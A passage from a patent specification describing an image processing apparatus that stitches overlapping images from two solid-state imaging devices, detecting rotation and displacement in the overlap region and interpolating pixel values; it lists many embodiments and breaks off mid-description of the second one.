regions of the images; displacement detecting means for detecting displacement (i.e., a displacement coefficient consisting of a rotation angle R and a parallel displacement S) representing a relation between a reference pixel and a given pixelin the overlap area of each image from the image data item read from the image storing means and representing the overlap area; interpolation means for interpolating the image data items read from the image storing means, in accordance with the rotationangle R and the parallel displacement S detected by the displacement detecting means, thereby to generate interpolated image data items; and image-synthesizing means for combining the interpolated image data items generated by the interpolation means,thereby to form a single large image. In a third aspect of the invention, there is provided an image processing apparatus for combining a plurality of images into a single large image such that the images have overlap regions, comprising: imaging means for intermittently scanningparts of an object image, thereby generating a plurality of image data items; image storing means for sequentially storing the image data items generated by the imaging means; reference image storing means storing an image data item representing areference image; motion vector detecting means for comparing each image data item read from the image storing means with the image data item read from the reference image storing means, thereby detecting correlation between the reference image and theimage represented by the image data item read from the image storing means and detecting a motion vector; and image-synthesizing means for processing the image data items stored in the image storing means, in accordance with the motion vectors detectedby the motion vector detecting means, thereby combining the image data items. In a fourth aspect of this invention, there is provided an image processing apparatus for combining a plurality of images into a single large image such that the images have overlap regions, comprising: image storing means for storing image dataitems; a plurality of display means for displaying images represented by the image data items read from the image storing means; interpolation means for interpolating the image data items in accordance with displacement coefficients for the displaymeans, thereby generating interpolated image data items representing images which are to be displayed by the display means, adjoining one another without displacement; and image-synthesizing and displaying means for combining the image data items storedin the image storing means and for displaying the images represented by the image data items and adjoining one another without displacement. Additional objects and advantages of the invention will be set forth in the description which follows, and in part will be obvious from the description, or may be learned by practice of the invention. The objects and advantages of the inventionmay be realized and obtained by means of the instrumentalities and combinations particularly pointed out in the appended claims. BRIEF DESCRIPTION OF THE DRAWINGS The accompanying drawings, which are incorporated in and constitute a part of the specification, illustrate presently preferred embodiments of the invention, and together with the general description given above and the detailed description ofthe preferred embodiments given below, serve to explain the principles of the invention. FIG. 1 is a diagram showing the positional relation of the optical system and the imaging devices--all incorporated in a conventional image processing apparatus; FIG. 2 is a diagram showing the specific positions the imaging devices assume in a conventional image processing apparatus, in order to cover the predetermined parts of the object; FIGS. 3A to 3D are diagrams explaining how a view-field image of an object is intermittently moved with respect to four imaging devices in a conventional image processing apparatus; FIGS. 4A and 4B are a block diagram and a diagram, respectively, showing the basic structure and operation of an image processing apparatus according to the invention; FIG. 5A is a diagram showing the imaging areas of the two CMDs incorporated in the apparatus shown in FIG. 4A, and FIG. 5B is a diagram showing the positional relation which each screen pixel has with the nearest four CMD pixels; FIG. 6 is a block diagram showing an image processing apparatus according to a first embodiment of the present invention; FIG. 7 is also a block diagram showing the displacement-detecting circuit and the interpolation circuit, both incorporated in the apparatus shown in FIG. 6; FIG. 8 is a diagram illustrating the imaging areas of the CMDs used in the apparatus of FIG. 6, which overlap each other in part; FIG. 9 is a diagram representing two displacement vectors resulting from the rotation and parallel movement of one CMD imaging area with respect to the other CMD imaging area, respectively; FIG. 10 is a diagram explaining how the displacement-detecting circuit shown in FIG. 7 executes correlation; FIG. 11 is a diagram illustrating the positional relation a specified screen pixel has with four CMD pixels located around the screen pixel; FIG. 12 is a diagram showing the position of each pixel in the CMD 8 and that of the corresponding pixel of the CMD 9, in terms of vectors; FIG. 13 is a block diagram which shows the displacement-detecting circuit and the interpolation circuit, both incorporated in an image processing apparatus according to a second embodiment of the present invention; FIGS. 14A and 14B are diagrams showing the light-splitting section of an image processing apparatus according to a third embodiment of this invention; FIG. 15 is a diagram representing the light distributions in the imaging areas of the CMDs 8 and 9 used in the third embodiment; FIG. 16 is a diagram illustrating the light distributions which have been obtained by applying an inverse function to different light distributions; FIG. 17 is a block diagram showing the image processing apparatus according to the third embodiment of the invention; FIG. 18 is a block diagram showing an image processing apparatus according to a fourth embodiment of the present invention; FIGS. 19A, 19B, and 19C are diagrams explaining how an input light flux applied may be applied through separator lenses in various manners, in the apparatus shown in FIG. 18. FIG. 20 is a block diagram showing an image processing apparatus according to a fifth embodiment of the present invention; FIG. 21 is a diagram showing the imaging areas of the two CMDs incorporated in the apparatus shown in FIG. 20; FIG. 22A is a block diagram showing an image processing apparatus according to a sixth embodiment of this invention; FIG. 22B is a diagram explaining how the CMDs are arranged in the apparatus of FIG. 22A; FIGS. 23A to 23D are perspective views of four alternative light-spitting sections for use in an image processing apparatus according to a seventh embodiment of the present invention; FIGS. 24A and 24B are a side view and a top view, respectively, of the light-splitting section shown in FIG. 23A; FIGS. 25A and 25B are a side view and a top view, respectively, of the light-splitting section shown in FIG. 23B; FIG. 26 is a diagram representing the imaging areas of the CMDs used in the seventh embodiment, and also the display area of the display section incorporated in the seventh embodiment; FIG. 27 is a perspective view showing an image processing apparatus according to an eighth embodiment of the present invention; FIGS. 28 and 29 are a plan view and a sectional view, respectively, explaining the first method of positioning CMDs; FIG. 30 is a side view of a CMD ceramic package having protruding metal terminals; FIG. 31 is a side view of a CMD ceramic package comprising a substrate and spacers mounted on both edges of the substrate; FIG. 32 is a plan view, explaining a method of positioning bare CMD chips on a ceramic substrate; FIGS. 33A to 33C are views, explaining a method of positioning CMDs, which is employed in the six embodiment of the invention; FIG. 34 is a side view, also explaining another method of positioning bare CMD chips on a ceramic substrate; FIG. 35A is a block diagram showing an image processing apparatus according to a ninth embodiment of the present invention; FIG. 35B corresponds to FIG. 35A, but with the image-synthesizing circuit being simplified to comprise an adder. FIG. 36 is a block diagram illustrating an image-synthesizing circuit incorporated in the ninth embodiment; FIG. 37 is a diagram explaining the linear interpolation the image-synthesizing circuit performs; FIG. 38 is a block diagram showing an image-synthesizing circuit which may be used in the ninth embodiment; FIG. 39 is a diagram explaining the linear interpolation which the circuit shown in FIG. 38 performs; FIG. 40 is a block diagram showing an image processing apparatus according to a tenth embodiment of the present invention; FIG. 41 is a block diagram showing a modification of the apparatus shown in FIG. 40; FIGS. 42A, 42B, and 42C are diagrams showing various operators which are used as weighting coefficients in the apparatus shown in FIG. 40; FIG. 42D is a block diagram showing an edge-emphasizing circuit of FIG. 40. FIGS. 43 and 44 are block diagram showing an image processing apparatus according to an eleventh embodiment of this invention; FIGS. 45A, 45B, and 45C are diagrams showing three alternative reference patterns which are alternatively used in the eleventh embodiment; FIGS. 46A and 46B are diagrams showing two types of reference pattern filters which are alternatively incorporated in an image processing apparatus according to a twelfth embodiment of the invention; FIG. 47 is a block diagram showing the apparatus which is the twelfth embodiment of this invention; FIGS. 48A and 48B are diagrams explaining how a synthesized image is rotated with respect to another image before being combined with the other image; FIG. 49 is a block diagram showing an image processing apparatus according to a thirteenth embodiment of the invention, in which a synthesized image is rotated as shown in FIGS. 48A and 48B; FIGS. 50A and 50B are diagrams explaining how to eliminate an undesirable portion from the adjoining area of a synthesized image, in the process of combining three or more images into a single image; FIG. 51 is a block diagram illustrating an image processing apparatus according to a fourteenth embodiment of the invention, in which an undesirable portion is eliminated from the adjoining area of a synthesized image as is shown in FIGS. 50A and50B; FIG. 52 is a block diagram showing a first-type synthesis section incorporated in an image processing apparatus according to a fifteenth embodiment of the invention; FIG. 53 is a diagram showing the apparatus which is the fifteenth embodiment of the present invention; FIG. 54 is a block diagram showing one of identical second-type synthesis sections used in the apparatus shown in FIG. 53; FIG. 55 is a diagram showing an image processing apparatus according to a sixteenth embodiment of the present invention; FIG. 56 is a block diagram showing one of the identical third-type synthesis sections used in the sixteenth embodiment; FIG. 57 is a side view of a projector which is a seventeenth embodiment of the invention; FIG. 58 is a block diagram of the imaging section of the projector shown in FIG. 57; FIG. 59 is a perspective view showing the half prism and the components associated therewith--all incorporated in the projector; FIG. 60 is a block diagram showing the system incorporated in the projector, for detecting the displacements of the LCDs used in the projector; FIG. 61 is a block diagram showing another system which may be used in the projector, to detect the displacement of the LCDs; FIG. 62 is a CRT monitor according to the present invention; FIG. 63 is a block diagram of a film-editing apparatus which is an eighteenth embodiment of this invention; FIGS. 64A to 64E are diagrams various positions the line sensors may assume in the apparatus shown in FIG. 63, and showing the condition of an image formed; FIGS. 65A and 65B are block diagrams showing, in detail, an image processing apparatus according to a nineteenth embodiment of the invention; FIG. 66 is a block diagram illustrating an image processing apparatus which is a twentieth embodiment of the present invention; FIG. 67 is a block diagram showing an electronic camera which is a twenty-first embodiment of this invention; FIG. 68 is a block diagram showing the shake-correcting circuit incorporated in the electronic camera of FIG. 67; FIGS. 69A to 69D are diagrams explaining how the imaging area of the camera (FIG. 67) moves, without shaking, with respect to the image of an object; FIGS. 70A to 70D are diagrams illustrating how the imaging area of the camera moves, while shaking, with respect to the image of an object; FIG. 71 is a diagram explaining the method of finding the correlation between a reference image and an object image by moving the object image with respect to the reference image; FIGS. 72A and 72B are diagrams explaining how to determine the distance and angle by which an image has moved and rotated; FIG. 73 is a diagram showing how an image is moved; FIGS. 74A and 74B are perspective views of the electronic camera (FIG. 67) and a recording section, explaining how to operate the camera in order to form an image of an object and record the image; FIG. 75 is a diagram showing the imaging section of an electronic camera which is a twenty-second embodiment of the invention; FIGS. 76A and 76B are diagrams explaining the technique which is employed in a twenty-third embodiment of the invention in order to calculate the correlation between images with high accuracy; FIG. 77 is a block diagram showing a shake-correcting circuit for use in a twenty-fourth embodiment of the invention; FIG. 78 is a block diagram showing the correlated area selector incorporated in the circuit illustrated in FIG. 77; FIG. 79 is a diagram showing images one of which may be selected by the image-selecting circuit incorporated in the correlated area selector shown in FIG. 78; FIGS. 80A, 80B, and 80C show three sets of coefficients for a convolution filter; FIG. 81 is a circuit for obtaining the absolute sum of the value differences among adjacent pixels; FIG. 82 is a side view showing the imaging section of an electronic camera; FIG. 83 is a side view illustrating another type of an imaging section for use in the electronic camera; FIG. 84 is a cross-sectional side view of the imaging section of an electronic camera which is a twenty-fifth embodiment of the invention; FIG. 85 is a circuit diagram showing the CMD incorporated in the imaging section of FIG. 84; FIG. 86 is a block diagram of the processing section used in the imaging section shown in FIG. 84; FIGS. 87A and 87B are a timing chart representing the timing of light-emission at the stroboscopic lamp incorporated in the electronic camera shown in FIG. 84; FIG. 88 is a cross-sectional side view of the imaging section of an electronic camera which is a twenty-sixth embodiment of the invention; FIG. 89 is a timing chart explaining how the mirror is intermittently driven in the imaging section shown in FIG. 88; FIGS. 90A and 90B are cross-sectional side views of the imaging section of an electronic camera which is a twenty-seventh embodiment of the invention, and FIG. 90C is a chart representing the timing of exposure performed in the imaging section ofFIGS. 90A and 90B; FIG. 90D is a cross-sectional view of the cam of FIG. 90A; FIG. 90E is a plan view of the screw of FIG. 90B. FIG. 91 is a block diagram illustrating the imaging section of an electronic camera which is a twenty-eighth embodiment of the invention; FIG. 92 is a block diagram showing an ultrasonic diagnosis apparatus which is a twenty-ninth embodiment of this invention and which is a modification of the embodiment shown in FIG. 91; FIG. 93 is a block diagram showing the imaging section of the twenty-ninth embodiment; FIG. 94 is a diagram showing a convex-type ultrasonic image; FIGS. 95A and 95B are diagrams explaining how to combine two images in the twenty-ninth embodiment of the invention; FIG. 96 is a diagram how to synthesize an image; FIGS. 97A, 97B, and 97C are diagrams illustrating the imaging section of an electronic camera which is a thirtieth embodiment of the present invention; FIG. 98 is a block diagram showing an apparatus for reproducing the image taken by the imaging section shown in FIGS. 97A, 97B, and 97C; FIG. 99 is a block diagram showing, in detail, the image-synthesizing circuit incorporated in the apparatus of FIG. 98; FIG. 100 is a diagram explaining how three images overlap and how the coefficients for the overlap regions change; FIG. 101 is a block diagram illustrating the image-adding section incorporated in the imaging section of FIG. 97C; FIG. 102 is a block diagram showing an electronic camera which is a thirty-first embodiment of the invention; FIG. 103 is a diagram showing the field of the view finder view of the camera illustrated in FIG. 102; FIG. 104A is a diagram explaining how to combine a plurality of images into a wide image in a thirty-second embodiment of the invention; FIG. 104B is a diagram showing the field of the view finder of the camera used in the thirty-second embodiment; FIGS. 105A and 105B are side views showing an electronic camera which is a thirty-third embodiment of the invention and which is used to read data from a flat original; FIG. 106 is a block diagram showing an image processing apparatus according to a thirty-fourth embodiment of the present invention; FIG. 107 is a plan view showing the photosensitive film used in the apparatus of FIG. 106; FIG. 108 is a diagram illustrating an address signal recorded on the magnetic tracks of the film shown in FIG. 107; FIGS. 109A, 109B, and 109C are diagrams showing the positions which recorded images assume on the imaging area of the film; FIG. 110 is a block diagram showing an image processing apparatus according to a thirty-fifth embodiment of the present invention; FIG. 111 is a perspective view showing the imaging section of the apparatus shown in FIG. 110; FIG. 112 is a block diagram showing an image processing apparatus according to a thirty-sixth embodiment of the present invention; FIG. 113 is a diagram illustrating an address signal recorded on the magnetic tracks of the film used in the apparatus of FIG. 112; FIGS. 114A and 114B is a block diagram showing an image processing apparatus according to a thirty-seventh embodiment of the present invention; FIG. 115 is a diagram showing the interpolation circuit incorporated in the apparatus of FIG. 114; FIG. 116A is a diagram showing the reference areas used for detecting the displacement of a G image; FIG. 116B is a diagram showing areas which are searched for that part of a R or B image which corresponds to a predetermined part of the G image; FIG. 117 is a diagram illustrating displacement vectors detected and processed in the thirty-seventh embodiment; FIG. 118 is a diagram showing, in detail, one of the identical correlation circuits used in the apparatus of FIG. 114; FIG. 119 is a diagram explaining how a pixel value is interpolated in the apparatus of FIG. 114; FIG. 120 is a diagram showing, in detail, one of the identical coefficient calculators incorporated in the apparatus of FIG. 114; FIG. 121 is a diagram showing, in detail, one of the identical coefficient memories of the apparatus shown in FIG. 114; FIG. 122 is a diagram showing an imaging area in which a R image, a G image, and a B image overlap one another; FIGS. 123A and 123B is a block diagram illustrating an image processing apparatus according to a thirty-eighth embodiment of the invention; FIG. 124 is a diagram showing a coefficient calculator incorporated in an image processing apparatus according to a thirty-ninth embodiment of the present invention; FIG. 125 is a diagram showing a coefficient memory used in the thirty-ninth embodiment; and FIG. 126 is a diagram illustrating one of L.times.L blocks of an image. DETAILED DESCRIPTION OF THE PREFERRED EMBODIMENTS The basic structure and operation of an image processing apparatus according to the present invention will be described, with reference to FIGS. 4A and 4B and FIGS. 5A and 5B. As FIG. 4A shows, the apparatus comprises a light-splitting section 1, an imaging section 2, an image-storing section 3, a displacement-detecting section 4, an interpolation section 5, an objective lens 6, a image-synthesizing section 7, and adisplay section 31. The imaging section 2 has two CMDs 8 and 9 (i.e., solid-state imaging devices). As shown in FIG. 4B, the CMDs 8 and 9 are positioned with such precision that they receive two parts of the optical image which over; lap in part. In operation, the objective lens 6 applies an optical image of an object (not shown) to the light-splitting section 1. The section 1 splits the input light into two parts representing two parts of the image which overlap in part. The parts ofthe image are applied to the CMDs 8 and 9 of the imaging section 2. The CMDs 8 and 9 convert the image parts into image signals, which are supplied to the image-storing section 3. The section 3, e.g., a frame memory, temporarily stores the imagesignals. Then, the displacement-detecting section 4 detects the positional relation between one of the pixels of either CMD (Charge Modulation Devices) and the corresponding pixel of the screen of the display section 31, from the image signal read fromthe image-storing section 3 and representing the overlap regions d of the two image parts shown in FIG. 5A, wherein the black dots indicate the pixels of the CMDs and the white dots indicate the pixels of the display screen. More specifically, thesection 4 performs correlation on the value of each CMD pixel, thereby calculating two conversion factors, i.e., rotation angle R and displacement S. In accordance with the conversion factors, the interpolation section 5 interpolates the value of each screen pixel from the values of the CMD pixels located near the screen pixel, thereby producing an interpolated pixel signal representing thescreen pixel. Thus, the interpolation section 5 outputs the interpolated pixel signals representing all pixels of the display section 31, to the image-synthesizing section 7. The image-synthesizing section 7 combines the image signals produced by the interpolation section 5 with the image signals read from the image-storing section 3, thereby generating image signals which represent a single continuous image of theobject. These image signals are supplied to the display section 31. The section 31 displays a high-resolution image of the object. Schematically shown in FIG. 5A are the imaging area a (i.e., an M.times.N pixel matrix) of the CMD 8, the imaging area b (i.e., an M.times.N pixel matrix) of the CMD 9, and the display area c of the display section 31. As is evident from FIG.5A, the display area c is an (u+v).times.w pixel matrix and is completely covered with the imaging areas a and b which overlap at regions d. In the instance shown in FIG. 5A, each pixel of the display area c assumes the same position as the correspondingpixel of the imaging area a. As has been described, the displacement-detecting section 4 detects the positional relation (i.e., rotation angle R and displacement S), between each pixel of the imaging area b and the corresponding pixel of the display area c, from the imagesignals read from the image-storing section 3 and representing the overlap regions d. To detect the positional relation, the section 4 needs the values of the pixels d.sub.11, d.sub.21, . . . d (u+v)w of the display area c--all indicated by white dots. For the values of the pixels d.sub.ij (i=1 to u, j=1 to w) of the display area c, the values of the pixels of CMD 8 are utilized. The value for each of the remaining pixels A of the display area c, i.e., the pixels d.sub.ij (i=u+1 to u+v, j=1 to w), isinterpolated from the values of the four pixels B, C, D and E of the imaging area b which surround the pixel d.sub.ij, as is illustrated in FIG. 5B. In order to calculate the value for any desired pixel of the display area c, it suffices to position the CMDs 8 and 9 with such precision that their imaging areas a and b completely cover the display area c of the display section 31 and overlapin part appropriately. Even if the pixels of either imaging area are deviated from the corresponding pixels of the display area c for a distance of several pixels, the apparatus can form a high-resolution single image of an object. It is therefore notnecessary to position the CMDs 8 and 9 with high precision on the order of a one-pixel distance as in the conventional image processing apparatus. Hence, the image processing apparatus according to the invention can be easily manufactured, and itsmanufacturing cost can be low. An image processing apparatus, which is a first embodiment of the invention, will now be described, with reference to FIGS. 6 to 12. The apparatus has a half prism 1a comprised of two right-angle prisms connected together. Two CMDs 8 and 9 (i.e., two-dimensional solid-state imaging devices) 8 and 9 are mounted on the top and back of the half prism 1a, respectively. The CMDs8 and 9 are positioned such that their imaging areas overlap in part. To the half prism 1a, an optical system 6 applies light which represents an image of an object (not shown). The half prism 1a splits the input light into two parts. The parts of the input light are applied to the CMDs 8 and 9. Each of the CMDs8 and 9 converts the input light into an image signal, under the control of a CMD driver 32. The image signals output by the CMDs 8 and 9 are supplied to pre-amplifiers 10 and 11, which amplify the signals. Low-pass filters (LPFs) 12 and 13 remove noise components from the amplified image signals. The signals output by the filters 12and 13 are input to A/D converters 14 and 15, respectively. The A/D converters 14 and 15 convert the input signals into digital image signals, which are supplied to subtracters 16 and 17. The FPNs (Fixed Pattern Noises) of the CMDs 8 and 9, stored in FPN memories 18 and 19, are supplied to the subtracters 16 and 17, respectively. The subtracter 16 takes the FPN of the CMD 8 from the image signal output from the A/D converter 14. Similarly, the subtracter 17 takes the FPN of the CMD 9 from the image signal output from the A/D converter 15. The image signals output by the subtracters 16 and 17 are input to signal processors (SPs) 20 and 21, which perform .gamma. correction oroutline emphasis on the input image signals. The image signals processed by the processors 20 and 21 are stored into frame memories 22 and 23, respectively. At a proper time, the image signals are read from the frame memories 22 and 23 and supplied to a displacement-detecting circuit 24. The circuit 24 detects the displacement of the overlap regions of the imaging areas of the CMDs 8 and 9. The displacement is defined by two conversion factors R and S. The factor R represents the rotation matrix R which one CMD imaging area has withrespect to the other CMD imaging area. The factor S represents the displacement vector which results from a parallel movement of one CMD imaging area with respect to the other CMD imaging area. The displacement, or the conversion factors R and S, are supplied from the circuit 24 to an interpolation circuit 25. The circuit 25 interpolates the pixel values read from the frame memory 23 in accordance with the conversion factors R and S.The pixel values, thus interpolated, are input to a parallel-serial (PS) converter 29, along with the signals read from the frame memory 22. The converter 29 converts the pixel values and the signals into serial signals. The serial signals are writteninto a frame memory 30 and read therefrom to a display section 31. The display section 31 displays a high-resolution single image of the object. The image processing apparatus has a system controller 33. The controller 33 controls the FPN memories 18 and 19, the frame memories 22 and 23, the interpolation circuit 25, the PS converter 29, and the CMD driver 32. The displacement-detecting circuit 24 and the interpolation circuit 25 will be described in detail, with reference to FIG. 7. The displacement-detecting circuit 24 comprises correlators 24a and 24b and a coefficient calculator 24c. The correlators 24a and 24b receive the image signals read from the frame memories 22 and 23, respectively, and perform correlation on theinput image signals. The image signals, thus processed, are input to the coefficient calculator 24c. The calculator 24c detects the displacement of the overlap regions of the CMD imaging areas, i.e., the conversion factors R and S. The conversion factors R and S are stored into the memories 26 and 27 incorporated in the interpolation circuit 25. In the interpolation circuit 25, the factors R and S read from the memories 26 and 27 are input to a coordinates-convertingcircuit 35. The coordinates value X1 of the point designated by the system controller 33 is input via a coordinates selector 34 to the coordinates-converting circuit 35. The circuit 35 converts the coordinates value X.sub.1 to a coordinate value X.sub.2,using the conversion factors R and S, in accordance with a predetermined conversion formula (10) which will be described later. The coordinate value X.sub.2 pertains to the imaging area of the CMD 9. The value X.sub.2 is supplied from thecoordinates-converting circuit 35 to a data-reading circuit 36 and an interpolation coefficient calculator 37. From the coordinate value X.sub.2 the data-reading circuit 36 produces pixel values v.sub.b, v.sub.c, v.sub.d, and v.sub.e, which are input to a linear interpolation circuit 38. Meanwhile, the interpolation coefficient calculator 37 calculatesinterpolation coefficients a, b, c, and d from the coordinate value X.sub.2 and inputs these coefficients a, b, c, and d to the linear interpolation circuit 38. In the linear interpolation circuit 38, the pixel values v.sub.b, v.sub.c, v.sub.d, andv.sub.e are supplied to four multipliers 39, respectively, and the interpolation coefficients a, b, c, and d are supplied also to the multipliers 39, respectively. The first multiplier 39 multiples the pixel value v.sub.b by the coefficient a; thesecond multiplier 39 multiples the pixel value V.sub.c by the coefficient b; the third multiplier 39 multiples the pixel value v.sub.d by the coefficient c; and the fourth multiplier 39 multiples the pixel value v.sub.e by the coefficient d. Further, inthe linear interpolation circuit 38, the outputs of the multipliers 39 are input to an adder 40 which adds the outputs of the multipliers 39, generating an interpolation value v.sub.a. To obtain the conversion factors R and S it is required that a reference point be set for the rotation and parallel movement of one of the CMD imaging areas with respect to the other CMD imaging area. In the first embodiment, as FIG. 8 shows,the reference point is the center C.sub.1 of an overlap area 1, i.e., those portions of the imaging areas of the CMDs 8 and 9 which will overlap one another if the CMDs 8 and 9 are positioned precisely. In practice, the CMDs 8 and 9 cannot be positionedprecisely, and an overlap area 2, i.e., the mutually overlapping portions of the imaging areas of the CMDs 8 and 9, has a center C.sub.2 which is displaced from the center C.sub.1 for a distance corresponding to the conversion factor S. As can beunderstood from FIG. 8, the overlap area 2 is rotated around the center C.sub.2 with respect to the overlap area 1 by an angle corresponding to the conversion factor R. The conversion factors S and R can be obtained from, for example, displacement vectors v.sub.1 and v.sub.2 in the overlap area 1 which are at positions P.sub.1 and P.sub.2 which are symmetrical with respect to the center C.sub.1. The vectorsv.sub.1 and v.sub.2 are presented by the following equations (1) and (2), respectively, because of the vectors r and s which result from the rotation of the imaging area the CMD 9 with respect to that of the CMD 8: where the vectors s and r are given as: Therefore, the vectors s and r are: The rotation matrix of the imaging area of the CMD 9 with respect to that of the CMD 8 is represented by the following equation: ##EQU1## Angle .theta. is found from the equation (2), as follows: In the equation (6), L is a known amount, and vector r is determined by the equation (4). Hence, angle .theta. can be found, and the rotation matrix R can also be obtained. The rotation matrix R and the displacement vector S (i.e., the vectorof the parallel displacement of the imaging area of the CMD 9), thus calculated from the displacement vectors v.sub.1 and v.sub.2 at positions P.sub.1 and P.sub.2, are stored as conversion factors R and S in the memories 26 and 27, respectively. The correlation the correlators 24a and 24b execute on the input image signals may be one of the various types hitherto known. In this embodiment, the correlation is effected as is shown in FIG. 10. That is, the correlator 24a detects theposition (x.sub.1, y.sub.1) where the absolute sum of the reference area r.sub.1 and r.sub.2 of the CMD 8 is minimum in the search area S.sub.1 of the CMD 9, and the correlator 24b detects the position (x.sub.2, y.sub.2) where the absolute sum of thereference area r.sub.1 and r.sub.2 of the CMD 8 is minimum in the search area S.sub.2 of the CMD 9. The coordinates values of these positions, (x.sub.1, y.sub.1) and (x.sub.2, y.sub.2), are input to the coefficient calculator 24c. The calculator 24cperforms the operations of the equations (3), (4), (6), and (5) sequentially on the coordinates values (x.sub.1, y.sub.1) and (x.sub.2, y.sub.2), obtaining the rotation matrix R and the displacement vector S. The displacement vector S=(S.sub.x, S.sub.y). The operation of the interpolation circuit 25 will be explained, with reference to FIGS. 6 and 7. The interpolation circuit 25 performs linear interpolation on the four pixel values read from the frame memory 23, thereby finding the value of the pixel at the position designated by the system controller 33, as will be described with referenceto FIG. 11. First, the value v.sub.a of the pixel A is obtained from the values v.sub.b, v.sub.c, v.sub.d, and v.sub.e of the four pixels B, C, D, and E which are located around the pixel A. More precisely, the values of v.sub.f and v.sub.g which thepixels located at the intersections F and G of the vertical line passing the pixel A, the line BC connecting the pixels B and C, and the line DE connecting the pixels D and E are: where BF=DG=m, and FC=GE=n. Assuming FA=p and AG=q, then the value va for the pixel A can be given as: If it is assumed that the inter-pixel distance is "1, " then m+n=p+q=1. Hence, from the equations (7-a), (7-b), and (8), the value v.sub.a for the pixel A is calculated as follows: where a=(1-p)(1-m), b=(1-p)m, c=p(1-m), and d=pm. Namely, the pixel value v.sub.a can be obtained directly from m, p, and the values v.sub.b, v.sub.c, v.sub.d, and v.sub.e of the four pixels located around the pixel A. It will now be explained how to find values for m and p, with reference to FIG. 12. In the first embodiment, m and p are of such values that the center C.sub.1 of the overlap area 1 of the CMD 8 is considered the origin of the coordinate, theposition any pixel assumes in the overlap area 1 is represented by vector x.sub.1, the center C.sub.2 of the overlap area 2 of the CMD 9 is regarded as the origin of the coordinate, and the position any pixel assumes in the overlap area 1 is representedby vector x.sub.2. To find m and p, it is necessary to convert the coordinates of the position represented by the vector x.sub.1 into vector x.sub.2. In other words, coordinate conversion must be carried out. Assuming that x.sub.1 =(i.sub.1, j.sub.1),and x.sub.2 =(i.sub.2, j.sub.2), and that the vectors x.sub.1 and x.sub.2 have different coordinate axes, the vector x.sub.2 will then be given as follows: where R-1 means the rotation by angle of -.theta.. In terms of the components of the vectors x nd x, the equation (10-a) changes to: ##EQU2## The equation (10-b) shows that the coordinates (i1, j1) in the imaging area of the CMD 8 are equivalent to the following coordinates in the imaging area of the CMD 9: The notation of (i.sub.2, j.sub.2) represents real numbers which define the coordinates of the pixel A shown in FIG. 11. Hence, m and p are given as: where the notation of (int) means integration of numbers. Similarly, the coordinates of the pixels B, C, D, and E are represented as follows: The conversion factors R and S calculated as described above are written into the memories 26 and 27 of the interpolation circuit 25 during the manufacture of the image processing apparatus. Thereafter it is unnecessary for thedisplacement-detecting circuit 24 to detect the conversion factor R or the conversion factor S. It suffices to read the factors R and S from the memories 26 and 27, respectively, whenever it is required to do so. Therefore, once the conversion factors R and S have been thus stored into the memories 26 and 27 of the interpolation circuit 25, the displacement-detecting circuit 24 is no longer necessary in the image processing apparatus. Stated in anotherwas, a user of the apparatus need not make use of the circuit 24. Usually, the circuit 24 is removed from the apparatus and used again in the factory to detect conversion factors R and S for another apparatus of the same type. It will now be explained how to use the image processing apparatus according to the first embodiment of the invention. First, the user holds the apparatus at a proper position, thus placing the image of an object within the view field, which he or she wishes to photograph at high resolution. The user then pulses the shutter-release button of the apparatus,whereby two image signals are stored into the frame memories 22 and 23. These image signals represent those parts of the optical image applied to the imaging areas of the CMD 8 and 9, respectively. Next, the image signals are read from the frame memories 22 and 23, ultimately inputting to the frame memory 30 the pixel signals representing the (u+v).times.w pixels, i.e., the pixel d 11 to d (u+v)w arranged in the display area c of thedisplay section 31. As is evident from FIG. 5A, the values of the pixels of CMD 8 are utilized for those of the pixels d 11 to d.sub.ij (i=1 to u, j=1 to w) of the display area c. The value for each of the remaining pixels of the display area c, i.e.,the pixels d.sub.ij (i=u+1 to u+v, j=1 to w), is interpolated from the values of the four pixels B, C, D and E of the imaging area b of the CMD 9 which are located around the pixel of the display area c. More precisely, the system controller 33designates the coordinates value X.sub.1 of any desired pixel d.sub.ij, and this value X.sub.1 is input to the interpolation circuit 25. In the circuit 25, the coordinates selector 34 selects a coordinates value x.sub.1 representing the position thepixel d.sub.ij assumes in the overlap area 1 of the CMD 8. The value x1, thus selected, is input to the coordinates-converting circuit 35. The circuit 35 calculates the coordinates value x.sub.2 of the from the coordinates value x.sub.1 pertaining tothe imaging area a of the CMD 8, using the conversion factors R and S in accordance with the equation (10). The coordinate value x.sub.2 is input to both the data-reading circuit 36 and the interpolation coefficient calculator 37. The data-reading circuit 36 calculates, from the coordinate value x.sub.2, the coordinates of the four pixels B, C, D, and E around the pixel A in accordance with the equation (12). Then, the circuit 36 reads the pixel values v.sub.b, v.sub.c,v.sub.d, and v.sub.e from the frame memory 23, which correspond to the coordinates values thus calculated, and inputs these pixel values to the linear interpolation circuit 38. The interpolation coefficient calculator 37 calculates m and p from the coordinate value x.sub.2 in accordance with the equation (11), thereby obtaining interpolation coefficients a, b, c, and d. These coefficients a, b, c, and d are input to thelinear interpolation circuit 38. The linear interpolation circuit 38 interpolates the value v.sub.a of the pixel d.sub.ij from the pixel values v.sub.b, v.sub.c, v.sub.d and v.sub.e and the interpolation coefficients a, b, c and d, in accordance with the equation (9). Thecoordinates value v.sub.a, thus calculated, is supplied to the PS converter 29. The coordinate values for all other desired pixel d.sub.ij are calculated in the same way and input to the PS converter 29. The PS converter 29 converts the pixel values,which are parallel data, to serial data, or a continuous image signal. The continuous image signal is written at predetermined addresses of the frame memory 30. The image signal is read from the frame memory 30 and supplied to the display section 31. The display section 31 displays a high-resolution single image of the object. The value for each pixel d.sub.ij may be output to the display section 31 from the PS converter 29 immediately after it has been interpolated by the interpolation circuit 25. If this is the case, the frame memory 30 can be dispensed with. As has been described, the image processing apparatus according to the first embodiment of the invention can form a single high-resolution image of na object even if the CMDs 8 and 9 are not positioned precisely, since the interpolation circuit25 interpolates the value for any desired pixel. Thus, the CMDs 8 and 9 need not be positioned with high precision, whereby the image processing apparatus can be manufactured at low cost. Moreover, since the apparatus has no mechanical, movablecomponents, it can be made small and light. In the first embodiment, the displacement-detecting circuit 24 is incorporated during the manufacture of the apparatus and is removed therefrom after the conversion factors R and S are stored into the memories 26 and 27 of the interpolationcircuit 25. Instead, the imaging section of the apparatus can have a connector so that the circuit 24 may be connected to the imaging section or disconnected therefrom. Further, the interpolation circuit 25 is not limited to the type which executeslinear interpolation. Rather, the circuit 25 may be one which effects a higher interpolation such as spline interpolation or a sinc interpolation. An image processing apparatus, which is a second embodiment of the invention will be described, with reference to FIG. 13. The first embodiment described above must process a considerably large amount of data whenever an image of an object is photographed, performing the calculations based on the equations (9), (10), (11), and (12). The second embodiment is designednot to effect these calculations on the image signals representing each image taken. To be more specific, as shown in FIG. 13, the second embodiment has an interpolation-coefficient writing circuit 28 